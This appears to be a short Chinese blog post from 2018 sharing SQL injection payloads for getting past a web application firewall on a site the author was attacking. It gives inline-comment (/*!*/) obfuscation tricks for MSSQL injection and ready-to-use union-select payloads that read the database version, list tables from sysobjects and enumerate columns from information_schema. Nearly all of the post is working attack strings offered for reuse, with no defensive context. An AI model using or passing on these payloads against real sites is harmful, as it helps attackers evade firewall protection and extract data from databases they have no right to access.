写于2018年10月
最近渗透某个站点遇到了狗,经过千辛万苦总算绕过了,在这里分享一下过狗payload
绕过的主要方法还是加/*!*/
这里我主要以mssql注入做测试
绕and
and /*!*/1=2/*!*/
这里面我用db_name/*!*/()绕过函数
绕全局变量
/*!'*/@@version/*!'*/
查表
union /*!x*//*!y*/select top 1 1,name,3 /*!x*//*!y*/from admin.dbo. sysobjects where xtype=0x55 and name not in(cast(0x6e6577 as char) )
查字段
union /*!x*//*!y*/select top 1 1,column_name,3 /*!y*//*!x*/from /*!'*/information_schema.columns/*!'*/ where table_name=’user’ and column_name not in(select top 2 column_name /*!y*//*!x*/from /*!'*/information_schema.columns/*!'*/ )